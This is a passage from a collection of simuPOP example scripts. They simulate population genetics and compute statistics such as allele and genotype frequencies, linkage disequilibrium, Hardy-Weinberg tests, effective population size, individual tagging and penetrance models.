simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(10000, loci=1)\npop.setVirtualSplitter(sim.CombinedSplitter(\n [sim.SexSplitter(), sim.AffectionSplitter()]))\nsim.initSex(pop)\nsim.initGenotype(pop, freq=[0.2, 0.8])\nsim.maPenetrance(pop, loci=0, penetrance=[0.1, 0.2, 0.5])\n# Count sim.population size\nsim.stat(pop, popSize=True, subPops=[(0, 0), (0, 2)])\n# popSize is the size of two VSPs, does not equal to total sim.population size.\n# Because two VSPs overlap (all males and all unaffected), popSize can be\n# greater than real sim.population size.\nprint(pop.dvars().subPopSize, pop.dvars().popSize)\n# print popSize of each virtual subpopulation.\nsim.stat(pop, popSize=True, subPops=[(0, 0), (0, 2)], vars='popSize_sp')\n# Note the two ways to access variable in (virtual) subpopulations.\nprint(pop.dvars((0,0)).popSize, pop.dvars().subPop[(0,2)]['popSize'])\n# Count number of male (should be the same as the size of VSP (0,0).\nsim.stat(pop, numOfMales=True)\nprint(pop.dvars().numOfMales)\n# Count the number of affected and unaffected male individual\nsim.stat(pop, numOfMales=True, subPops=[(0, 2), (0, 3)], vars='numOfMales_sp')\nprint(pop.dvars((0,2)).numOfMales, pop.dvars((0,3)).numOfMales)\n# or number of affected male and females\nsim.stat(pop, numOfAffected=True, subPops=[(0, 0), (0, 1)], vars='numOfAffected_sp')\nprint(pop.dvars((0,0)).numOfAffected, pop.dvars((0,1)).numOfAffected)\n# These can also be done using a sim.ProductSplitter...\npop.setVirtualSplitter(sim.ProductSplitter(\n [sim.SexSplitter(), sim.AffectionSplitter()]))\nsim.stat(pop, popSize=True, subPops=[(0, x) for x in range(4)])\n# counts for male unaffected, male affected, female unaffected and female affected\nprint(pop.dvars().subPopSize)\n#end_file\n\n\n#begin_file log/statNumOfSegSites.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, loci=[1]*100)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.3, 0.7]),\n sim.PyOutput('#all 0\\t#seg sites\\t#all 1\\n'),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(numOfSegSites=sim.ALL_AVAIL,\n vars=['numOfSegSites', 'numOfFixedSites']),\n sim.PyEval(r'\"%d\\t%d\\t%d\\n\" % (100-numOfSegSites-numOfFixedSites,'\n 'numOfSegSites, numOfFixedSites)',\n step=50)\n ],\n gen=500\n)\n# output a list of segregating sites\nsim.stat(pop, numOfSegSites=sim.ALL_AVAIL, vars='segSites')\nprint(pop.dvars().segSites)\n#end_file\n\n\n#begin_file log/statAlleleFreq.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(10000, loci=1)\npop.setVirtualSplitter(sim.AffectionSplitter())\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(loci=0, freq=[0.8, 0.2])\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.MaPenetrance(penetrance=[0.1, 0.4, 0.6], loci=0),\n sim.Stat(alleleFreq=0, subPops=[(0, 0), (0, 1)],\n vars=['alleleFreq', 'alleleFreq_sp']),\n sim.PyEval(r\"'Gen: %d, freq: %.2f, freq (aff): %.2f, freq (unaff): %.2f\\n' % \" + \\\n \"(gen, alleleFreq[0][1], subPop[(0,1)]['alleleFreq'][0][1],\" + \\\n \"subPop[(0,0)]['alleleFreq'][0][1])\"),\n ],\n gen = 5\n)\n#end_file\n\n#begin_file log/statGenoFreq.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, loci=[1, 1, 1], lociNames=['A', 'X', 'Y'],\n chromTypes=[sim.AUTOSOME, sim.CHROMOSOME_X, sim.CHROMOSOME_Y])\nsim.initGenotype(pop, freq=[0.01, 0.05, 0.94])\nsim.stat(pop, genoFreq=['A', 'X']) # both loci indexes and names can be used.\nprint('Available genotypes on autosome:', list(pop.dvars().genoFreq[0].keys()))\nfor i in range(3):\n for j in range(3):\n print('%d-%d: %.3f' % (i, j, pop.dvars().genoFreq[0][(i,j)]))\n\nprint('Genotype frequency on chromosome X:\\n', \\\n '\\n'.join(['%s: %.3f' % (x,y) for x,y in pop.dvars().genoFreq[1].items()]))\n#end_file\n\n#begin_file log/statHeteroFreq.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, loci=1)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(heteroFreq=0, step=10),\n sim.PyEval(r\"'Gen: %d, HeteroFreq: %.2f\\n' % (gen, heteroFreq[0])\", step=20)\n ],\n gen = 100\n)\n#end_file\n\n#begin_file log/statHaploFreq.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.utils import viewVars\npop = sim.Population(100, loci=3)\nsim.initGenotype(pop, freq=[0.2, 0.4, 0.4], loci=0)\nsim.initGenotype(pop, freq=[0.2, 0.8], loci=2)\nsim.stat(pop, genoFreq=[0, 1, 2], haploFreq=[0, 1, 2],\n vars=['genoNum', 'haploFreq'])\nviewVars(pop.vars(), gui=False)\n#end_file\n\n#begin_file log/statInfo.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population([500], infoFields='anc')\n# Defines VSP 0, 1, 2, 3, 4 by anc.\npop.setVirtualSplitter(sim.InfoSplitter('anc', cutoff=[0.2, 0.4, 0.6, 0.8]))\n#\npop.evolve(\n initOps=[\n sim.InitSex(),\n # anc is 0 or 1\n sim.InitInfo(lambda : random.randint(0, 1), infoFields='anc')\n ],\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.InheritTagger(mode=sim.MEAN, infoFields='anc')\n ]),\n postOps=[\n sim.Stat(popSize=True, meanOfInfo='anc', varOfInfo='anc',\n subPops=[(0, sim.ALL_AVAIL)]),\n sim.PyEval(r\"'Anc: %.2f (%.2f), #inds: %s\\n' %\" + \\\n \"(meanOfInfo['anc'], varOfInfo['anc'], \" + \\\n \"', '.join(['%4d' % x for x in subPopSize]))\")\n ],\n gen = 5,\n)\n#end_file\n\n#begin_file log/statLD.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([1000]*2, loci=3)\nsim.initGenotype(pop, freq=[0.2, 0.8], subPops=0)\nsim.initGenotype(pop, freq=[0.8, 0.2], subPops=1)\nsim.stat(pop, LD=[[0, 1, 0, 0], [1, 2]],\n vars=['LD', 'LD_prime', 'R2', 'LD_ChiSq', 'LD_ChiSq_p', 'CramerV',\n 'LD_prime_sp', 'LD_ChiSq_p_sp'])\nfrom pprint import pprint\npprint(pop.vars())\n#end_file\n\n#begin_file log/statAssociation.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.utils import *\nfrom simuPOP.sampling import drawCaseControlSample\ndef assoTest(pop):\n 'Draw case-control sample and apply association tests'\n sample = drawCaseControlSample(pop, cases=500, controls=500)\n sim.stat(sample, association=(0, 2), vars=['Allele_ChiSq_p', 'Geno_ChiSq_p', 'Armitage_p'])\n print('Allele test: %.2e, %.2e, Geno test: %.2e, %.2e, Trend test: %.2e, %.2e' \\\n % (sample.dvars().Allele_ChiSq_p[0], sample.dvars().Allele_ChiSq_p[2],\n sample.dvars().Geno_ChiSq_p[0], sample.dvars().Geno_ChiSq_p[2],\n sample.dvars().Armitage_p[0], sample.dvars().Armitage_p[2]))\n return True\n\npop = sim.Population(size=100000, loci=3)\npop.setVirtualSplitter(sim.ProportionSplitter([0.5, 0.5]))\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[0]*3, subPops=[(0,0)]),\n sim.InitGenotype(genotype=[1]*3, subPops=[(0,1)]),\n ],\n matingScheme=sim.RandomMating(ops=sim.Recombinator(loci=[0, 1], rates=[0.01, 0.005])),\n postOps=[\n sim.MaPenetrance(loci=1, penetrance=[0.1, 0.2, 0.4]),\n sim.PyOperator(func=assoTest, step=20),\n ],\n gen = 100\n)\n#end_file\n\n#begin_file log/statStructure.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.utils import migrIslandRates\nsimu = sim.Simulator(sim.Population([5000]*3, loci=10, infoFields='migrate_to'),\n rep=2)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n preOps=sim.Migrator(rate=migrIslandRates(0.01, 3), reps=1),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(structure=range(10), step=40),\n sim.PyEval(\"'Fst=%.3f (rep=%d without migration) ' % (F_st, rep)\", step=40, reps=0),\n sim.PyEval(\"'Fst=%.3f (rep=%d with migration) ' % (F_st, rep)\", step=40, reps=1),\n sim.PyOutput('\\n', reps=-1, step=40)\n ],\n gen = 200\n)\n#end_file\n\n#begin_file log/statHWE.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([1000], loci=1)\npop.setVirtualSplitter(sim.ProportionSplitter([0.4, 0.4, 0.2]))\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[0,0], subPops=[(0,0)]),\n sim.InitGenotype(genotype=[0,1], subPops=[(0,1)]),\n sim.InitGenotype(genotype=[1,1], subPops=[(0,2)]),\n ],\n preOps=[\n sim.Stat(HWE=0, genoFreq=0),\n sim.PyEval(r'\"HWE p-value: %.5f (AA: %.2f, Aa: %.2f, aa: %.2f)\\n\" % (HWE[0], '\n 'genoFreq[0][(0,0)], genoFreq[0][(0,1)] + genoFreq[0][(1,0)], genoFreq[0][(1,1)])'),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(HWE=0, genoFreq=0),\n sim.PyEval(r'\"HWE p-value: %.5f (AA: %.2f, Aa: %.2f, aa: %.2f)\\n\" % (HWE[0], '\n 'genoFreq[0][(0,0)], genoFreq[0][(0,1)] + genoFreq[0][(1,0)], genoFreq[0][(1,1)])'),\n ],\n gen = 1\n)\n#end_file\n\n#begin_file log/statIBD.py\nimport simuOpt\nsimuOpt.setOptions(alleleType='lineage')\n#begin_ignore\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\n#sim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([500], loci=[1]*100)\npop.evolve(\n initOps=[\n sim.InitLineage(),\n sim.InitSex(),\n sim.InitGenotype(freq=[0.2]*5),\n ],\n preOps=[\n sim.Stat(inbreeding=sim.ALL_AVAIL, popSize=True, step=10),\n sim.PyEval(r'\"gen %d: IBD freq %.4f, IBS freq %.4f, est: %.4f\\n\" % '\n '(gen, sum(IBD_freq.values()) /len(IBD_freq), '\n ' sum(IBS_freq.values()) /len(IBS_freq), '\n ' 1 - (1-1/(2.*popSize))**gen)', step=10)\n ],\n matingScheme=sim.RandomMating(),\n gen = 100\n)\n#end_file\n\n\n\n\n#begin_file log/statNeDemographic.py\nimport simuOpt\nsimuOpt.setOptions(alleleType='lineage', quiet=True)\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([2000], loci=[1]*3,\n chromTypes=[sim.AUTOSOME, sim.CHROMOSOME_X, sim.CHROMOSOME_Y])\npop.setVirtualSplitter(sim.SexSplitter())\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.3, 0.7]),\n ],\n preOps=[\n sim.Stat(effectiveSize=range(3), subPops=[0, (0,0), (0,1)],\n vars='Ne_demo_base_sp'),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(effectiveSize=range(3), subPops=[0, (0,0), (0,1)],\n vars='Ne_demo_sp'),\n sim.PyEval(r'\"Demographic Ne: %.1f (auto), %.1f (X), %.1f (Y), '\n r'Males: %.1f, %.1f, %.1f, Females: %.1f, %.1f, %.1f\\n\"'\n '% tuple([subPop[0][\"Ne_demo\"][x] for x in (0, 1, 2)] + '\n '[subPop[(0,0)][\"Ne_demo\"][x] for x in (0, 1, 2)] + '\n '[subPop[(0,1)][\"Ne_demo\"][x] for x in (0, 1, 2)])')\n ],\n gen = 5\n)\n#end_file\n\n\n#begin_file log/statNeTemporal.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([2000], loci=[1]*50)\npop.setVirtualSplitter(sim.RangeSplitter([0, 500]))\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.3, 0.7]),\n sim.Stat(effectiveSize=range(50), subPops=[(0,0)],\n vars='Ne_temporal_base'),\n ],\n preOps=[\n sim.Stat(effectiveSize=range(50), subPops=[(0,0)],\n vars=['Ne_waples89_P1', 'Ne_tempoFS_P1'], step=20),\n sim.PyEval(r'\"Waples Ne: %.1f (%.1f - %.1f), TempoFS: '\n r'%.1f (%.1f - %.1f), at generation %d\\n\" % '\n 'tuple(Ne_waples89_P1 + Ne_tempoFS_P1 + [gen])', step=20)\n ],\n matingScheme=sim.RandomMating(),\n gen = 101\n)\n#end_file\n\n#begin_file log/statNeInterval.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([2000], loci=[1]*50)\npop.setVirtualSplitter(sim.RangeSplitter([0, 500]))\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.3, 0.7]),\n sim.Stat(effectiveSize=range(50), subPops=[(0,0)],\n vars='Ne_temporal_base'),\n ],\n preOps=[\n sim.Stat(effectiveSize=range(50), subPops=[(0,0)], \n vars='Ne_waples89_P1', step=20),\n sim.Stat(effectiveSize=range(50), subPops=[(0,0)], step=20,\n suffix='_i', vars=['Ne_temporal_base', 'Ne_waples89_P1']),\n sim.PyEval(r'\"Waples Ne (till %d): %.1f (%.1f - %.1f), '\n r'(interval) %.1f (%.1f - %.1f)\\n\" % '\n 'tuple([gen] + Ne_waples89_P1 + Ne_waples89_P1_i)',\n step=20)\n ],\n matingScheme=sim.RandomMating(),\n gen = 101\n)\n#end_file\n\n\n#begin_file log/statNeLD.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([2000], loci=[1]*50)\npop.setVirtualSplitter(sim.RangeSplitter([0, 500]))\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.005]*4 + [0.015]*2 + [0.25, 0.7]),\n ],\n preOps=[\n sim.Stat(effectiveSize=sim.ALL_AVAIL, subPops=[(0,0)], \n vars='Ne_LD', step=20),\n sim.PyEval(r'\"LD Ne (gen %d): %.1f (%.1f - %.1f)'\n r', %.1f (%.1f - %.1f, adjusted)\\n\" % '\n 'tuple([gen] + Ne_LD[0.] + Ne_LD[0.02])',\n step=20)\n ],\n matingScheme=sim.RandomMating(),\n gen = 101\n)\n#end_file\n\n\n#begin_file log/statChromTypes.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, loci=[5]*4,\n chromTypes=[sim.AUTOSOME, sim.CHROMOSOME_X, sim.CHROMOSOME_Y, sim.MITOCHONDRIAL])\npop.setVirtualSplitter(sim.SexSplitter())\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(haplotypes=[ [0, 1, 2, 0, 1]*4, [2, 1, 0, 2, 3]*4 ],\n prop=[0.4, 0.6]),\n ],\n matingScheme=sim.RandomMating(\n ops=[\n sim.MendelianGenoTransmitter(),\n sim.MitochondrialGenoTransmitter()]),\n preOps=[\n sim.Stat(neutrality=range(5)),\n sim.Stat(neutrality=range(5, 10), suffix='_X'),\n sim.Stat(neutrality=range(10, 15), suffix='_Y'),\n sim.Stat(neutrality=range(15, 20), suffix='_mt'),\n sim.PyEval(r'\"%.3f %.3f %.3f %.3f\\n\" % (Pi, Pi_X, Pi_Y, Pi_mt)'),\n ],\n gen = 2\n)\n#end_file\n\n\n\n#begin_file log/InheritTagger.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[1000]*10, loci=1, infoFields='x')\n# tag the first individual of each subpopulation.\nfor sp in range(pop.numSubPop()):\n pop.individual(0, sp).x = 1\n\npop.evolve(\n initOps=sim.InitSex(),\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.InheritTagger(mode=sim.MAXIMUM, infoFields='x'),\n ]),\n postOps=[\n sim.Stat(sumOfInfo='x', vars=['sumOfInfo_sp']),\n sim.PyEval(r'\", \".join([\"%3d\" % subPop[i][\"sumOfInfo\"][\"x\"] for i in range(10)])+\"\\n\"'),\n ],\n gen = 5\n)\n#end_file\n\n#begin_file log/SummaryTagger.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\nsim.IdTagger().reset(1)\n#end_ignore\npop = sim.Population(1000, loci=1, infoFields=['fitness', 'avgFitness'])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n ],\n preOps=sim.MaSelector(loci=0, wildtype=0, fitness=[1, 0.99, 0.95]),\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.SummaryTagger(mode=sim.MEAN, infoFields=['fitness', 'avgFitness']),\n ]),\n postOps=[\n sim.Stat(alleleFreq=0, meanOfInfo='avgFitness', step=10),\n sim.PyEval(r\"'gen %d: allele freq: %.3f, average fitness of parents: %.3f\\n' % \"\n \"(gen, alleleFreq[0][1], meanOfInfo['avgFitness'])\", step=10)\n ],\n gen = 50,\n)\n#end_file\n\n\n#begin_file log/OffspringTagger.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\nsim.IdTagger().reset(1)\n#end_ignore\npop = sim.Population(1000, loci=1, infoFields='offspring_idx')\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n ],\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n # lethal recessive alleles\n sim.MaSelector(loci=0, wildtype=0, fitness=[1, 0.90, 0.5]),\n sim.OffspringTagger(),\n sim.DiscardIf('offspring_idx > 4'),\n ], numOffspring=10),\n postOps=[\n sim.Stat(alleleFreq=0, step=10),\n sim.PyEval(r\"'gen %d: allele freq: %.3f\\n' % \"\n \"(gen, alleleFreq[0][1])\", step=10)\n ],\n gen = 50,\n)\n#end_file\n\n#begin_file log/IdTagger.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\nsim.IdTagger().reset(1)\n#end_ignore\npop = sim.Population(10, infoFields='ind_id', ancGen=1)\npop.evolve(\n initOps=sim.IdTagger(),\n matingScheme=sim.RandomSelection(ops=[\n sim.CloneGenoTransmitter(),\n sim.IdTagger(),\n ]),\n gen = 1\n)\nprint([int(ind.ind_id) for ind in pop.individuals()])\npop.useAncestralGen(1)\nprint([int(ind.ind_id) for ind in pop.individuals()])\nsim.tagID(pop) # re-assign ID\nprint([int(ind.ind_id) for ind in pop.individuals()])\n#end_file\n\n#begin_file log/PedigreeTagger.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\nsim.IdTagger().reset(1)\n#end_ignore\npop = sim.Population(100, infoFields=['ind_id', 'father_id', 'mother_id'])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.IdTagger(),\n sim.PedigreeTagger(output='>>pedigree.txt'),\n ],\n matingScheme=sim.RandomMating(ops=[\n sim.IdTagger(),\n sim.PedigreeTagger(output='>>pedigree.txt'),\n sim.MendelianGenoTransmitter()]\n ),\n gen = 100\n)\nped = open('pedigree.txt')\nlines = ped.readlines()\nped.close()\n# first few lines, saved by the first PedigreeTagger\nprint(''.join(lines[:3]))\n# last several lines, saved by the second PedigreeTagger\nprint(''.join(lines[-3:]))\n# load this file\nped = sim.loadPedigree('pedigree.txt')\n# should have 100 ancestral generations (plus one present generation)\nped.ancestralGens()\n#begin_ignore\nimport os\nos.remove('pedigree.txt')\n#end_ignore\n#end_file\n\n#begin_file log/PyTagger.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\ndef randomMove(x, y):\n '''Pass parental information fields to offspring'''\n # shift right with high concentration of alleles... \n off_x = random.normalvariate((x[0]+x[1])/2., 0.1)\n off_y = random.normalvariate((y[0]+y[1])/2., 0.1)\n return off_x, off_y\n\npop = sim.Population(1000, loci=[1], infoFields=['x', 'y'])\npop.setVirtualSplitter(sim.GenotypeSplitter(loci=0, alleles=[[0, 0], [0,1], [1, 1]]))\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n sim.InitInfo(random.random, infoFields=['x', 'y'])\n ],\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.PyTagger(func=randomMove),\n ]),\n postOps=[\n sim.Stat(minOfInfo='x', maxOfInfo='x'),\n sim.PyEval(r\"'Range of x: %.2f, %.2f\\n' % (minOfInfo['x'], maxOfInfo['x'])\")\n ],\n gen = 5\n)\n\n#end_file\n\n#begin_file log/otherTagging.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, loci=[1], infoFields=['aff', 'numOfAff'])\n# define virtual subpopulations by affection sim.status\npop.setVirtualSplitter(sim.AffectionSplitter())\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n ],\n preOps=[\n # get affection sim.status for parents\n sim.MaPenetrance(loci=0, wildtype=0, penetrance=[0.1, 0.2, 0.4]),\n # set 'aff' of parents\n sim.InfoExec('aff = ind.affected()', exposeInd='ind'),\n ],\n # get number of affected parents for each offspring and store in numOfAff\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.SummaryTagger(mode=sim.SUMMATION, infoFields=['aff', 'numOfAff'])]),\n postOps=[\n # get affection sim.status for offspring\n sim.MaPenetrance(loci=0, wildtype=0, penetrance=[0.1, 0.2, 0.4]),\n # calculate mean 'numOfAff' of offspring, for unaffected and affected subpopulations.\n sim.Stat(meanOfInfo='numOfAff', subPops=[(0,0), (0,1)], vars=['meanOfInfo_sp']),\n # print mean number of affected parents for unaffected and affected offspring.\n sim.PyEval(r\"'Mean number of affected parents: %.2f (unaff), %.2f (aff)\\n' % \"\n \"(subPop[(0,0)]['meanOfInfo']['numOfAff'], subPop[(0,1)]['meanOfInfo']['numOfAff'])\")\n ],\n gen = 5\n)\n\n#end_file\n\n\n\n#begin_file log/MapPenetrance.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=2000, loci=2)\nsim.initGenotype(pop, freq=[.2, .8])\nsim.mapPenetrance(pop, loci=0,\n penetrance={(0,0):0, (0,1):.2, (1,1):.3})\nsim.stat(pop, genoFreq=0, numOfAffected=1, vars='genoNum')\n# number of affected individuals\npop.dvars().numOfAffected\n# which should be roughly (#01 + #10) * 0.2 + #11 * 0.3\n(pop.dvars().genoNum[0][(0,1)] + pop.dvars().genoNum[0][(1,0)]) * 0.2 \\\n+ pop.dvars().genoNum[0][(1,1)] * 0.3\n#end_file\n\n#begin_file log/MaPenetrance.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(5000, loci=3)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.9] + [0.02]*5)\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.MaPenetrance(loci=0, penetrance=(0.01, 0.2, 0.3)),\n sim.Stat(numOfAffected=True, vars='propOfAffected'),\n sim.PyEval(r\"'Gen: %d Prevalence: %.1f%%\\n' % (gen, propOfAffected*100)\"),\n ],\n gen = 5\n)\n#end_file\n\n#begin_file log/MlPenetrance.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(5000, loci=3)\nsim.initGenotype(pop, freq=[0.2]*5)\n# the multi-loci penetrance\nsim.mlPenetrance(pop, mode=sim.MULTIPLICATIVE,\n ops = [sim.MaPenetrance(loci=loc,\n penetrance=[0, 0.3, 0.6]) for loc in range(3)])\n# count the number of affected individuals.\nsim.stat(pop, numOfAffected=True)\npop.dvars().numOfAffected\n#end_file\n\n#begin_file log/PyPenetrance.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(size=2000, loci=[1]*2, infoFields=['p', 'smoking'])\npop.setVirtualSplitter(sim.InfoSplitter(field='smoking', values=[0,1]))\n# the second parameter gen can be used for varying selection pressure\ndef penet(geno, smoking):\n # BB Bb bb\n # AA 0.01 0.01 0.01\n # Aa 0.01 0.03 0.03\n # aa 0.01 0.03 0.05\n #\n # geno is (A1 A2 B1 B2)\n if geno[0] + geno[1] == 1 and geno[2] + geno[3] != 0:\n v = 0.03 # case of AaBb\n elif geno[0] + geno[1] == 2 and geno[2] + geno[3] == 1:\n v = 0.03 # case of aaBb\n elif geno[0] + geno[1] ==2 and geno[2] + geno[3] == 2:\n v = 0.05 # case of aabb\n else: \n v = 0.01 # other cases\n if smoking:\n return v * 2\n else:\n return v\n\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.5, .5]),\n sim.PyOutput('Calculate prevalence in smoker and non-smokers\\n'),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n # set smoking status randomly\n sim.InitInfo(lambda : random.randint(0,1), infoFields='smoking'),\n # assign affection status\n sim.PyPenetrance(loci=[0, 1], func=penet),\n sim.Stat(numOfAffected=True, subPops=[(0, sim.ALL_AVAIL)], \n vars='propOfAffected_sp', step=20),\n sim.PyEval(r\"'Non-smoker: %.2f%%\\tSmoker: %.2f%%\\n' % \"\n \"(subPop[(0,0)]['propOfAffected']*100, subPop[(0,1)]['propOfAffected']*100)\",\n step=20)\n ],\n gen = 50\n)\n\n#end_file\n\n\n\n#begin_file log/PyQuanTrait.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(size=5000, loci=2, infoFields=['qtrait1', 'qtrait2', 'age'])\npop.setVirtualSplitter(sim.InfoSplitter(field='age', cutoff=[40]))\ndef qtrait(geno, age):\n 'Return two traits that depends on genotype and age'\n return random.normalvariate(age * sum(geno), 10), random.randint(0, 10*sum(geno))\n\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.2, 0.8]),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n # use random age for simplicity\n sim.InitInfo(lambda:random.randint(20, 75), infoFields='age'),\n sim.PyQuanTrait(loci=(0,1), func=qtrait, infoFields=['qtrait1', 'qtrait2']),\n sim.Stat(meanOfInfo=['qtrait1'], 